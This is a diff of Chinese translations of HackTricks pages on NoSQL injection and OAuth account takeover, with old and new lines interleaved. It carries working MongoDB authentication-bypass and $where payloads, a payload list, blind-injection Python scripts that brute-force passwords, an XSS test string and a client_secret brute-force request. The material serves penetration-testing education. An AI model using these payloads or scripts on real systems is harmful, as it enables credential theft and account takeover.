如果你对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!**_需要流利的波兰语书写和口语能力_)。
{% embed url="https://www.stmcyber.com/careers" %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,32 +1,33 @@
# NoSQL注入
# NoSQL 注入
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=nosql-injection)可以轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=nosql-injection) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=nosql-injection" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为英雄</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
## 利用
PHP中您可以发送一个数组将发送的参数从_parameter=foo_更改为_parameter\[arrName]=foo._
PHP 中,你可以通过将发送的参数从 _parameter=foo_ 更改为 _parameter\[arrName]=foo._ 来发送一个数组。
利用基于添加一个**运算符**
这些利用基于添加一个 **运算符**
```bash
username[$ne]=1$password[$ne]=1 #<Not Equals>
username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
@ -37,7 +38,7 @@ username[$ne]=admin&pass[$gt]=s #<Greater Than>
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)
{ $where: "this.credits == this.debits" }#<IF>, can be used to execute code
```
### 基本身份验证绕过
### 基本证绕过
**使用不等于 ($ne) 或大于 ($gt)**
```bash
@ -51,24 +52,22 @@ username[$exists]=true&password[$exists]=true
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
```
### **SQL - Mongo**
### **SQL - Mongo**
```javascript
query = { $where: `this.username == '${username}'` }
```
攻击者可以通过输入类似 `admin' || 'a'=='a` 的字符串来利用这一点,使查询返回所有通过满足重言(`'a'=='a'`)条件的文档。这类似于 SQL 注入攻击,其中使用诸如 `' or 1=1-- -` 的输入来操纵 SQL 查询。在 MongoDB 中,可以使用诸`' || 1==1//`、`' || 1==1%00` 或 `admin' || 'a'=='a` 的输入来执行类似的注入
攻击者可以通过输入类似 `admin' || 'a'=='a` 的字符串来利用这一点,使查询返回所有文档,因为满足了一个恒真条件 (`'a'=='a'`)。这类似于 SQL 注入攻击,其中使用像 `' or 1=1-- -` 的输入来操纵 SQL 查询。在 MongoDB 中,可以使用类似的注入,输入`' || 1==1//`、`' || 1==1%00` 或 `admin' || 'a'=='a`
```
Normal sql: ' or 1=1-- -
Mongo sql: ' || 1==1// or ' || 1==1%00 or admin' || 'a'=='a
```
### 提取**长度**信息
### 提取 **length** 信息
```bash
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
# True if the length equals 1,3...
```
### 提取**数据**信息
### 提取 **数据** 信息
```
in URL (if length == 3)
username[$ne]=toto&password[$regex]=a.{2}
@ -86,8 +85,6 @@ in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
```
### **SQL - Mongo**
### **SQL - Mongo**
```
/?search=admin' && this.password%00 --> Check if the field password exists
@ -100,9 +97,9 @@ in JSON
...
/?search=admin' && this.password && this.password.match(/^duvj78i3u$/)%00 Found
```
### PHP任意函数执行
### PHP 任意函数执行
使用[MongoLite](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite)库的**$func**运算符(默认使用)可能会导致像[这份报告](https://swarm.ptsecurity.com/rce-cockpit-cms/)中描述的任意函数执行
使用 [MongoLite](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite) 库的 **$func** 操作符(默认使用),可能会执行任意函数,如 [此报告](https://swarm.ptsecurity.com/rce-cockpit-cms/) 中所述
```python
"user":{"$func": "var_dump"}
```
@ -110,9 +107,9 @@ in JSON
### 从不同集合获取信息
可以使用[$lookup](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/)从不同的集合中获取信息。在下面的示例中,我们从一个名为`users`的**不同集合**中读取数据,并获取所有密码与通配符匹配的**条目的结果**
可以使用 [**$lookup**](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) 从不同的集合中获取信息。在下示例中,我们正在从一个名为 **`users`** **不同集合** 中读取,并获取 **所有条目** 的结果,这些条目的密码与通配符匹配。
**注意:** 只有在使用`aggregate()`函数执行搜索时,才能使用`$lookup`和其他聚合函数,而不能使用更常见的`find()`或`findOne()`函数。
**注意:** 只有在使用 `aggregate()` 函数进行搜索时,`$lookup` 和其他聚合函数才可用,而不是更常用的 `find()``findOne()` 函数。
```json
[
{
@ -134,14 +131,14 @@ in JSON
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=nosql-injection) 可轻松构建和**自动化**由全球**最先进**的社区工具驱动的工作流。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=nosql-injection) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=nosql-injection" %}
## MongoDB 负载
## MongoDB Payloads
列表[从这里](https://github.com/cr0hn/nosqlinjection\_wordlists/blob/master/mongodb\_nosqli.txt)
列表 [来自这里](https://github.com/cr0hn/nosqlinjection\_wordlists/blob/master/mongodb\_nosqli.txt)
```
true, $where: '1 == 1'
, $where: '1 == 1'
@ -171,7 +168,7 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
{"username": {"$gt":""}, "password": {"$gt":""}}
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
```
## 盲 NoSQL 脚本
## 盲 NoSQL 脚本
```python
import requests, string
@ -207,9 +204,9 @@ if 'OK' in r.text:
print("Found one more char : %s" % (password+c))
password += c
```
### 从POST登录暴力破解用户名和密码
### 从POST登录进行暴力破解用户名和密码
这是一个简单的脚本,您可以修改,但之前的工具也可以执行此任务。
这是一个简单的脚本,您可以对其进行修改,但之前的工具也可以完成此任务。
```python
import requests
import string
@ -249,36 +246,37 @@ return usernames
for u in get_usernames(""):
get_password(u)
```
## 工具
## Tools
* [https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration](https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration)
* [https://github.com/C4l1b4n/NoSQL-Attack-Suite](https://github.com/C4l1b4n/NoSQL-Attack-Suite)
## 参考资料
## References
* [https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media](https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)
* [https://nullsweep.com/a-nosql-injection-primer-with-mongo/](https://nullsweep.com/a-nosql-injection-primer-with-mongo/)
* [https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb](https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb)
{% hint style="success" %}
学习和实践 AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版本的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs收藏品](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=nosql-injection)轻松构建和**自动化工作流程**,由全球**最先进**的社区工具驱动。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=nosql-injection) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=nosql-injection" %}

View file

@ -1,52 +1,53 @@
# OAuth to Account takeover
# OAuth 到账户接管
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
## Basic Information <a href="#d4a8" id="d4a8"></a>
## 基本信息 <a href="#d4a8" id="d4a8"></a>
OAuth 提供了各种版本,基础信息可以在 [OAuth 2.0 documentation](https://oauth.net/2/) 中找到。本讨论主要集中在广泛使用的 [OAuth 2.0 authorization code grant type](https://oauth.net/2/grant-types/authorization-code/),提供一个**授权框架,使应用程序能够访问或在另一个应用程序(授权服务器)上的用户账户上执行操作**
OAuth 提供多种版本,基础信息可在 [OAuth 2.0 文档](https://oauth.net/2/) 中获取。本讨论主要集中在广泛使用的 [OAuth 2.0 授权码授权类型](https://oauth.net/2/grant-types/authorization-code/),提供一个 **授权框架,使应用程序能够访问或在另一个应用程序中执行用户账户的操作**(授权服务器)
考虑一个假设的网站 _**https://example.com**_,旨在**展示你所有的社交媒体帖子**,包括私人帖子。为实现这一点,使用了 OAuth 2.0。_https://example.com_ 将请求你**访问你的社交媒体帖子**的权限。因此,在 _https://socialmedia.com_ 上会出现一个同意屏幕,概述**请求的权限和发出请求的开发者**。在你授权后_https://example.com_ 将能够**代表你访问你的帖子**
考虑一个假设的网站 _**https://example.com**_,旨在 **展示您所有的社交媒体帖子**,包括私人帖子。为此,采用 OAuth 2.0。_https://example.com_ 将请求您的权限以 **访问您的社交媒体帖子**。因此_https://socialmedia.com_ 上会出现一个同意屏幕,概述 **请求的权限和发起请求的开发者**。在您授权后_https://example.com_ 获得 **代表您访问您的帖子** 的能力
理解 OAuth 2.0 框架中的以下组件至关重要
理解 OAuth 2.0 框架中的以下组件至关重要:
* **resource owner**: 你,作为**用户/实体**,授权访问你的资源,如你的社交媒体账户帖子。
* **resource server**: **管理经过身份验证的请求的服务器**,在应用程序代表 `resource owner` 获得 `access token`,例如 **https://socialmedia.com**
* **client application**: **寻求 `resource owner` 授权的应用程序****https://example.com**
* **authorization server**: **在成功验证 `resource owner` 并获得授权后向 `client application` 发放 `access tokens` 的服务器**,例如 **https://socialmedia.com**
* **client\_id**: 应用程序的公共、唯一标识符。
* **client\_secret:** 仅应用程序和授权服务器知道的机密密钥,用于生成 `access_tokens`。
* **response\_type**: 指定**请求的令牌类型**的值,`code`
* **scope**: `client application` 请求的**访问级别**
* **redirect\_uri**: **用户授权后重定向的 URL**通常必须与预注册的重定向 URL 一致。
* **state**: 一个参数,用于**在用户重定向到授权服务器和从授权服务器返回时保持数据**。其唯一性对于作为**CSRF 保护机制**至关重要。
* **grant\_type**: 指示**授权类型和返回的令牌类型**的参数。
* **code**: 来自 `authorization server` 的授权代码,`client application` 使用 `client_id``client_secret` 与之配合以获取 `access_token`。
* **access\_token**: **client application 代表 `resource owner` 进行 API 请求时使用的令牌**。
* **refresh\_token**: 使应用程序能够**在不重新提示用户的情况下获取新的 `access_token`**
* **资源拥有者**:您,作为 **用户/实体**,授权访问您的资源,例如您的社交媒体账户帖子。
* **资源服务器**:在应用程序为 `资源拥有者` 获取 `访问令牌` 后,**管理经过身份验证请求的服务器**,例如 **https://socialmedia.com**
* **客户端应用程序****向 `资源拥有者` 请求授权的应用程序**,例**https://example.com**
* **授权服务器**:在成功验证 `资源拥有者` 并获得授权后,**向 `客户端应用程序` 发放 `访问令牌` 的服务器**,例如 **https://socialmedia.com**
* **client\_id**:应用程序的公共唯一标识符。
* **client\_secret**:仅应用程序和授权服务器知道的机密密钥,用于生成 `访问令牌`。
* **response\_type**:指定 **请求的令牌类型** 的值,例`code`
* **scope**`客户端应用程序` 请求的 **访问级别**
* **redirect\_uri**:用户在授权后被重定向的 **URL**。这通常必须与预注册的重定向 URL 一致。
* **state**:一个参数,用于 **在用户重定向到授权服务器及返回时维护数据**。其唯一性对于作为 **CSRF 保护机制** 至关重要。
* **grant\_type**:指示 **授权类型和要返回的令牌类型** 的参数。
* **code**:来自 `授权服务器` 的授权码,客户端应用程序与 `client_id``client_secret` 一起使用以获取 `访问令牌`。
* **access\_token**:客户端应用程序代表 `资源拥有者` 用于 API 请求的 **令牌**。
* **refresh\_token**:使应用程序能够 **在不重新提示用户的情况下获取新的 `访问令牌`**
### Flow
### 流程
**实际的 OAuth 流程**如下:
1. 导航到 [https://example.com](https://example.com) 并选择“与社交媒体集成”按钮。
2. 该网站然后向 [https://socialmedia.com](https://socialmedia.com) 发送请求,要求你授权 https://example.com 的应用程序访问你的帖子。请求的结构如下
1. 导航到 [https://example.com](https://example.com) 并选择“与社交媒体集成”按钮。
2. 然后该网站向 [https://socialmedia.com](https://socialmedia.com) 发送请求,请求您的授权以让 https://example.com 的应用程序访问您的帖子。请求的结构为
```
https://socialmedia.com/auth
?response_type=code
@ -55,62 +56,62 @@ https://socialmedia.com/auth
&scope=readPosts
&state=randomString123
```
3. 然后会出现一个同意页面。
4. 在您批准后,Social Media 会将带有 `code``state` 参数的响应发送到 `redirect_uri`
3. 然后您将看到一个同意页面。
4. 在您批准后,社交媒体会向 `redirect_uri` 发送一个包含 `code``state` 参数的响应:
```
https://example.com?code=uniqueCode123&state=randomString123
```
5. https://example.com 利用这个 `code`,连同它的 `client_id``client_secret`,发起一个服务器端请求以获取一个 `access_token`,从而代表你访问你同意的权限:
5. https://example.com 利用这个 `code`,连同它的 `client_id``client_secret`,发起服务器端请求以代表您获取 `access_token`,从而访问您同意的权限:
```
POST /oauth/access_token
Host: socialmedia.com
...{"client_id": "example_clientId", "client_secret": "example_clientSecret", "code": "uniqueCode123", "grant_type": "authorization_code"}
```
6. 最后https://example.com 使用你的 `access_token` Social Media 发起 API 调用以访问
6. 最后,过程结束时,https://example.com 使用你的 `access_token`社交媒体发起 API 调用以访问
## 漏洞 <a href="#id-323a" id="id-323a"></a>
## Vulnerabilities <a href="#id-323a" id="id-323a"></a>
### Open redirect\_uri <a href="#cc36" id="cc36"></a>
`redirect_uri` 在 OAuth 和 OpenID 实现中对安全性至关重要,因为它指示授权后将敏感数据(如授权代码)发送到哪里。如果配置错误,可能允许攻击者将这些请求重定向到恶意服务器,从而实现账户接管。
`redirect_uri` 对于 OAuth 和 OpenID 实现的安全性至关重要,因为它指示在授权后敏感数据(如授权代码)发送到何处。如果配置错误,可能会允许攻击者将这些请求重定向到恶意服务器,从而实现账户接管。
利用技术授权服务器的验证逻辑而异。它们可以从严格的路径匹配到接受指定域或子目录内的任何 URL。常见的利用方法包括开放重定向、路径遍历、利用弱正则表达式和 HTML 注入以窃取令牌
利用技术根据授权服务器的验证逻辑而异。它们可以从严格的路径匹配到接受指定域或子目录内的任何 URL。常见的利用方法包括开放重定向、路径遍历、利用弱正则表达式和 HTML 注入进行令牌窃取
除了 `redirect_uri`,其他 OAuth 和 OpenID 参数如 `client_uri`、`policy_uri`、`tos_uri` 和 `initiate_login_uri` 也容易受到重定向攻击。这些参数是可选的,它们的支持在各服务器之间有所不同。
除了 `redirect_uri`,其他 OAuth 和 OpenID 参数如 `client_uri`、`policy_uri`、`tos_uri` 和 `initiate_login_uri` 也容易受到重定向攻击。这些参数是可选的,其支持在不同服务器之间有所不同。
对于那些针对 OpenID 服务器的人来说,发现端点(`**.well-known/openid-configuration**`)通常列出有价值的配置细节,如 `registration_endpoint`、`request_uri_parameter_supported` 和 `require_request_uri_registration`。这些细节有助于识别注册端点和服务器的其他配置细节。
对于那些针对 OpenID 服务器的攻击者,发现端点(`**.well-known/openid-configuration**`)通常列出有价值的配置细节,如 `registration_endpoint`、`request_uri_parameter_supported` 和 "`require_request_uri_registration`。这些细节可以帮助识别注册端点和服务器的其他配置细节。
### XSS in redirect implementation <a href="#bda5" id="bda5"></a>
正如这个漏洞赏金报告中提到的 [https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html](https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html)可能存在重定向 **URL 在用户认证后被反映在服务器响应中**,从而 **易受 XSS 攻击**。可能的测试有效载荷:
正如这个漏洞赏金报告中提到的 [https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html](https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html)重定向 **URL 可能在用户认证后被反射在服务器的响应中**,因此 **容易受到 XSS 攻击**。可以测试的有效载荷:
```
https://app.victim.com/login?redirectUrl=https://app.victim.com/dashboard</script><h1>test</h1>
```
### CSRF - 不当处理 state 参数 <a href="#bda5" id="bda5"></a>
### CSRF - Improper handling of state parameter <a href="#bda5" id="bda5"></a>
OAuth 实现中,**`state` 参数**的误用或省略会显著增加**跨站请求伪造 (CSRF)** 攻击的风险。当 `state` 参数**未使用、使用静态值或未正确验证**时,会导致攻击者绕过 CSRF 保护
OAuth实现中**`state`参数**的误用或遗漏会显著增加**跨站请求伪造CSRF**攻击的风险。当`state`参数**未使用、作为静态值使用或未正确验证**时攻击者可以绕过CSRF保护从而产生此漏洞
攻击者可以通过拦截授权过程,将他们的账户与受害者的账户链接,从而导致潜在的**账户接管**。这在使用 OAuth 进行**身份验证**的应用程序中尤为关键。
攻击者可以通过拦截授权过程,将他们的账户与受害者的账户关联,从而导致潜在的**账户接管**。在使用OAuth进行**身份验证**的应用程序中,这一点尤其关键。
在各种**CTF 挑战**和**黑客平台**中,已经记录了这种漏洞的实际例子,突显了其实际影响。该问题还扩展到与第三方服务(如 **Slack**、**Stripe** 和 **PayPal**)的集成,攻击者可以将通知或付款重定向到他们的账户。
在各种**CTF挑战**和**黑客平台**中记录了此漏洞的真实案例,突显了其实际影响。该问题还扩展到与第三方服务的集成,如**Slack**、**Stripe**和**PayPal**,攻击者可以将通知或付款重定向到他们的账户。
正确处理和验证**`state` 参数**对于防范 CSRF 和保护 OAuth 流程至关重要。
正确处理和验证**`state`参数**对于防范CSRF和保护OAuth流程至关重要。
### 预账户接管 <a href="#ebe4" id="ebe4"></a>
### Pre Account Takeover <a href="#ebe4" id="ebe4"></a>
1. **在创建账户时没有电子邮件验证**:攻击者可以预先使用受害者的电子邮件创建账户。如果受害者稍后使用第三方服务登录,应用程序可能会无意中将此第三方账户链接到攻击者预先创建的账户,从而导致未经授权的访问。
2. **利用松散的 OAuth 电子邮件验证**:攻击者可能利用不验证电子邮件的 OAuth 服务,通过注册他们的服务,然后将账户电子邮件更改为受害者的。这种方法同样存在未经授权的账户访问风险,类似于第一种情况,但通过不同的攻击向量。
1. **在账户创建时未进行电子邮件验证**:攻击者可以预先使用受害者的电子邮件创建账户。如果受害者稍后使用第三方服务登录,应用程序可能会不经意地将此第三方账户链接到攻击者预先创建的账户,从而导致未经授权的访问。
2. **利用宽松的OAuth电子邮件验证**攻击者可能会利用不验证电子邮件的OAuth服务通过注册其服务并将账户电子邮件更改为受害者的电子邮件来进行攻击。这种方法同样存在未经授权的账户访问风险,类似于第一种情况,但通过不同的攻击向量。
### 秘密泄露 <a href="#e177" id="e177"></a>
### Disclosure of Secrets <a href="#e177" id="e177"></a>
识别和保护秘密的 OAuth 参数至关重要。虽然**`client_id`**可以安全公开,但泄露**`client_secret`**会带来重大风险。如果 `client_secret` 被泄露,攻击者可以利用应用程序的身份和信任来**窃取用户 `access_tokens`** 和私人信息。
识别和保护秘密的OAuth参数至关重要。虽然**`client_id`**可以安全披露,但泄露**`client_secret`**会带来重大风险。如果`client_secret`被泄露,攻击者可以利用应用程序的身份和信任来**窃取用户的`access_tokens`**和私人信息。
常见的漏洞出现在应用程序错误地在客户端而不是服务器端处理授权 `code` 换取 `access_token` 的过程中。这种错误导致 `client_secret` 的暴露,使攻击者能够以应用程序的名义生成 `access_tokens`。此外,通过社会工程,攻击者可以通过添加额外的范围来提升 OAuth 授权的权限,进一步利用应用程序的信任状态。
一个常见的漏洞出现在应用程序错误地在客户端而不是服务器端处理授权`code`与`access_token`的交换时。这个错误导致`client_secret`的暴露,使攻击者能够以应用程序的名义生成`access_tokens`。此外,通过社会工程,攻击者可以通过向OAuth授权添加额外的范围来提升权限,进一步利用应用程序的信任状态。
### Client Secret 暴力破解
### Client Secret Bruteforce
你可以尝试对服务提供商的 **client\_secret** 进行暴力破解,以尝试窃取账户。\
暴力破解请求可能类似于:
您可以尝试**暴力破解服务提供商的client\_secret**与身份提供者,以试图窃取账户。\
暴力破解请求可能类似于:
```
POST /token HTTP/1.1
content-type: application/x-www-form-urlencoded
@ -120,29 +121,29 @@ Connection: close
code=77515&redirect_uri=http%3A%2F%2F10.10.10.10%3A3000%2Fcallback&grant_type=authorization_code&client_id=public_client_id&client_secret=[bruteforce]
```
### Referer Header 泄露 Code 和 State
### Referer Header leaking Code + State
一旦客户端获得了 **code 和 state**,如果它们在浏览到不同页面时被 **反映在 Referer header 中**,那么它是脆弱的
一旦客户端拥有了 **code 和 state**,如果它们在浏览到不同页面时 **反映在 Referer 头中**,那么它就存在漏洞
### 访问令牌存储在浏览器历史记录中
### Access Token Stored in Browser History
查看 **浏览器历史记录并检查访问令牌是否保存在其中**
前往 **浏览器历史记录并检查访问令牌是否保存在其中**
### 永久授权码
### Everlasting Authorization Code
**授权码应该只存在一段时间,以限制攻击者窃取和使用它的时间窗口**。
**授权码应该只存在一段时间,以限制攻击者可以窃取和使用它的时间窗口**。
